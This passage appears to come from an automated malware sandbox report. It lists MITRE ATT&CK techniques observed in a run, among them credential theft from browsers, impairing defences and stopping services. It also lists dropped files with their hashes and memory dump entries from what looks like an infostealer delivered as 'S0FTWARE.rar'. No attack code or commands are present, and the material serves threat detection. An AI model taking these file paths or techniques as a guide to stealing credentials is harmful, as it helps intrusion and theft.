  2⤵
  PID:868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\EBGIDGCAFC.exe

Filesize
5.6MB

MD5
f590f83bdd469676d2bc2a190929ace0

SHA1
4d7bb47f7380898459f07e1036dc7fdd9554fbbb

SHA256
563015bcb142ed3e68a05f81de8d72e820b02ae7c4e97618721042162922079f

SHA512
b5038f19f463d2f20f745dace5370e10788af5d9892def719123a95e2eae7acd727b9d1e0ff79ad4ff1c540040b1e1c86f097fbf9b9f81045efc1b4f5726fcf1

Download Submit
C:\ProgramData\HCGCBFHCFCFB\KECBGC

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

Filesize
2KB

MD5
62c5cca9c8b934e8b4dc220ac36f8ac4

SHA1
60151e9261c22fdbd9d956612fec64df9fa5c3ac

SHA256
a7aeb8e9a37eac23da57dbe3f8769099c4384c838931a42e33d7316c0d94fd5c

SHA512
b5c04cc643ee7ad74189e95477736090f99e4c26c5d8c4e67279044002415353a6210112c064653e9b1c345b960ff8090a1923e183d3692e565f403bf5ec11f1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

Filesize
2KB

MD5
8b870d5dc2e99b1ebfde0e409b040801

SHA1
1a7ddff529bba5201869ba7a14c22acfd196d132

SHA256
b7b63f2c047c43b34f309f38b4b66dae6fed1489fffbfac4267b14f642345419

SHA512
cb66782619e5598d742745626260381e0b76308e59f3234982bc64babf4721016704c32e4e1dcf90c289f2cc6de5ab7ea3b4db20512739f37ae590c7ddaf650e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

Filesize
1KB

MD5
8515f6b60a6e8becf75da139b0767c36

SHA1
a926e7923af47636662c56e51ec8e0485d0e7b61

SHA256
42f8b46499f0f8fd94833336b4bdc1e908cb2b6b719d72229764bef52b80a6d6

SHA512
67450b06ebcc344b6eee9e5913a741161b1cf081cdb0d4ea5a6224735b2d490c46f1cb4783299265ec13212672af49de8b271b284951c9c229c700468ed322d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

Filesize
458B

MD5
620aa0fff4518d42e583826b6c76b023

SHA1
0d8d8d5e16b0e645247ee6cffd02df9f564c047f

SHA256
133a68c539531bf38fc3f311e319a3c8859af7b04316dd30fd77d78481c94948

SHA512
ee37439733169e2237e2522573c62c1e95836b7190b7a896f0b2bb3f92d32440dc324c4c4d11feab148711c0143310302bbf9ed69d0142399e779f307584c8e4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

Filesize
450B

MD5
9844960b6a1b04c9114b8bb72ebf6f57

SHA1
a09cd4fdd9402e835716cb3232d35d6204bbad4f

SHA256
306375178a316805eae9bd26142856169c62274c8ee73b13c5c098183d7dbdc5

SHA512
d82fcd2ef98a1d413ef3efec7036b9b568dd98475f92a73b9ebd5869bfbc0d491ffc6a99081ee4878a5aae7a4aabba3dc3d5fa08c5384fb8fcd1d97fc7da6566

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

Filesize
458B

MD5
56a2fabd5b876a5c24f93ee56f071bc3

SHA1
6e3102f0d3aaf036ef8dbef6b57fa01b8cbc2e30

SHA256
fdeda69d40e47c579ff6f7268083df150ea8b5b97742585be225f9d47371820c

SHA512
914e28803fee6b9ed1b5c9f92e31bac305c8cc85fac4a2065f3b96437fb00a74fc6d48c4d42a0fddce3352204e451f9fb3c54f218db8de88d0b4150d8a5a233b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ab8ce148cb7d44f709fb1c460d03e1b0

SHA1
44d15744015155f3e74580c93317e12d2cc0f859

SHA256
014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff

SHA512
f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
38f59a47b777f2fc52088e96ffb2baaf

SHA1
267224482588b41a96d813f6d9e9d924867062db

SHA256
13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b

SHA512
4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
f50f9afbcef2ffbb933712fe234ba574

SHA1
cc856a720affbbeda110fee4ddcbff7de5cc7805

SHA256
dd7c94642e3ace78dc695498a07cee89b52eb8391aeed9f77fc59b75e279bb41

SHA512
d79e96ee46caa932a2169c18787cc1f97924d301cb9b521e19bf028bd40629e889104c42ad14398198b04b2061617441fe262b97886ef99da6e4c23457654505

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cb3d482bc312387cf61a9f2219490406

SHA1
b2a8d8b981d42f9d9f873db1526b4158a66a30ca

SHA256
f8d81da27b610702ec12ee58994e6d55fcc65ab2124b84480b88d38694f86ecd

SHA512
acdd03af442ee9e26c9241bc32f29dfd1c61857de9146a7809e5771d20ca30404eac68fa448ec770798b0655d9b879cad04292bb95ca352ec61fe567e1e5d7c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9c643c2c0978b6d179b89154e1b08d3e

SHA1
c6205bad1711328f0eff9b2cec6d75f1d4d91126

SHA256
495da9d11ec013d7e4e9f472d59ae6b711f2d4c6dbac3aedb705e405e47af15d

SHA512
870aeb76b6ed9a59b1ccb9f466d91f1c2321a947a29774bd62a8ef44f29ef48a3889859caccb96fcd9519e7be42951374f98add852510660a9a113918a0153e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ae65f0e7d7ec105961e7d427fa02045c

SHA1
37d366a6664ed5224601dccbdb3d73607055fc2c

SHA256
60a72b0cb96d77fcd3b56aa6e5e1202d88029891b1c9485019b98336b7f1c06e

SHA512
5c3deafdb81647b360ad17233e36d5650bd717431d4136cafae4b86170bdee784901e10cf94d5976b814bbc6b754e305eca146a83a1c96586d02ef420673d170

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
3e39a912853ccec120396527ce345e15

SHA1
c423496b70f92323f07ea8a654de70d469df18b6

SHA256
cea2027c2345b981332130f91278864aa0dcce182c8a66207b3c80dc82280daf

SHA512
95f3ce3fe22e97159adf2e6dabf61e9c55c28d290e4aae132467ed566fca96c150a4a5330d84671979ffb52d055e47881436d6e707b1964220ebfb7c92d4e93e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
b112e1e5e896adf8e3e4bd065ed6a93e

SHA1
583297ed310ce11317108f7fb0403636adcf000f

SHA256
3fc54756b507290c0af1e8abf2879c315626187cd4f7c5f23d2e77ecaac60663

SHA512
fdfff6188be4936e8108780e8269e3f21761ed8c31e5aa86cfa4e5705a45c7c6bdc442a8f3df022a77dd37bf00d79683a302a9f2a4bf44d4d87186dfeae4dd4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d26420a8331b9dbbe98784c49da2256c

SHA1
4e959354d9d0498aa732870458f232d2f4d2d4fe

SHA256
f56c8f1b33ed3e5581d3d00e6521dc11ac4b7adfa232e95b81c27bf9076282ac

SHA512
4b3ae37c3befadffe3d4b0305d5b789f278d662f2b0ad05925ec25291bebca7a93e97441e58d57e4140cb49b518b1e1a9a412b588d313ca8e8b1afef214f9e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ai0m1wgt.oq5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\S0FTWARE.rar

Filesize
22.9MB

MD5
8de55e761d9cca762efd4ecbcb6110d2

SHA1
bb67ab9a56db612cee7a3ad2d7e3482e95a3975a

SHA256
3aea0028c8083f4c85642b6692a8eba2511dbe3cec52ac239f34dca9c8081f28

SHA512
d00bf4f9cf053acf24d651f7ea25a43de0321fec033993ee83cf4d381610c289f6df3044cb46b929e0d29f568377bd51cd0cb866eed4575353327eab511c529f

Download Submit
C:\Users\Admin\Downloads\S0FTWARE\S0FTWARE.exe

Filesize
21.1MB

MD5
cfe61c91004402eb43efa2cceb6fd2a0

SHA1
ab7fbc240d4fe28e895adbe166df108268dac58a

SHA256
a490fe9a531f182f99e5de208cdbf9a1e53556b7c3883f18be5e1f7ed3629b6b

SHA512
d32467ff81d84cae2d386d42d8b4a7dc556c50998523bdc153fb003fc1a526e78f49156cb5191bb9216026fea67b3a4043a149de74612564e9c35210f95dd91b

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
memory/868-656-0x0000000000B90000-0x0000000000BB0000-memory.dmp

Filesize
128KB

Download
memory/868-659-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-651-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-658-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-660-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-653-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-649-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-652-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-650-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-654-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-655-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/868-657-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2796-566-0x00007FF603CE0000-0x00007FF604820000-memory.dmp

Filesize
11.2MB

Download
memory/2912-608-0x00007FF71A3D0000-0x00007FF71AF10000-memory.dmp

Filesize
11.2MB

Download
memory/2916-592-0x0000027F9E6D0000-0x0000027F9E6F2000-memory.dmp

Filesize
136KB

Download
memory/3708-643-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3708-645-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3708-644-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3708-642-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3708-641-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3708-648-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4012-634-0x000001BF735F0000-0x000001BF735F8000-memory.dmp

Filesize
32KB

Download
memory/4012-633-0x000001BF73640000-0x000001BF7365A000-memory.dmp

Filesize
104KB

Download
memory/4012-636-0x000001BF73630000-0x000001BF7363A000-memory.dmp

Filesize
40KB

Download
memory/4012-635-0x000001BF73620000-0x000001BF73626000-memory.dmp

Filesize
24KB

Download
memory/4012-628-0x000001BF733B0000-0x000001BF733CC000-memory.dmp

Filesize
112KB

Download
memory/4012-629-0x000001BF733D0000-0x000001BF73485000-memory.dmp

Filesize
724KB

Download
memory/4012-630-0x000001BF73490000-0x000001BF7349A000-memory.dmp

Filesize
40KB

Download
memory/4012-631-0x000001BF73600000-0x000001BF7361C000-memory.dmp

Filesize
112KB

Download
memory/4012-632-0x000001BF735E0000-0x000001BF735EA000-memory.dmp

Filesize
40KB

Download
memory/4068-547-0x00000000008C0000-0x0000000000B17000-memory.dmp

Filesize
2.3MB

Download
memory/4068-575-0x00000000008C0000-0x0000000000B17000-memory.dmp

Filesize
2.3MB

Download
memory/4068-576-0x0000000021F40000-0x000000002219F000-memory.dmp

Filesize
2.4MB

Download
memory/4068-590-0x00000000008C0000-0x0000000000B17000-memory.dmp

Filesize
2.3MB

Download
memory/4068-574-0x00000000008C0000-0x0000000000B17000-memory.dmp

Filesize
2.3MB

Download
memory/4068-550-0x00000000008C0000-0x0000000000B17000-memory.dmp

Filesize
2.3MB

Download
memory/4068-591-0x00000000008C0000-0x0000000000B17000-memory.dmp

Filesize
2.3MB

Download
memory/4144-493-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-487-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-519-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-518-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-527-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-492-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-488-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-526-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-472-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-471-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-458-0x00000000227D0000-0x0000000022A2F000-memory.dmp

Filesize
2.4MB

Download
memory/4144-456-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-455-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-443-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-441-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download
memory/4144-439-0x0000000001200000-0x0000000001457000-memory.dmp

Filesize
2.3MB

Download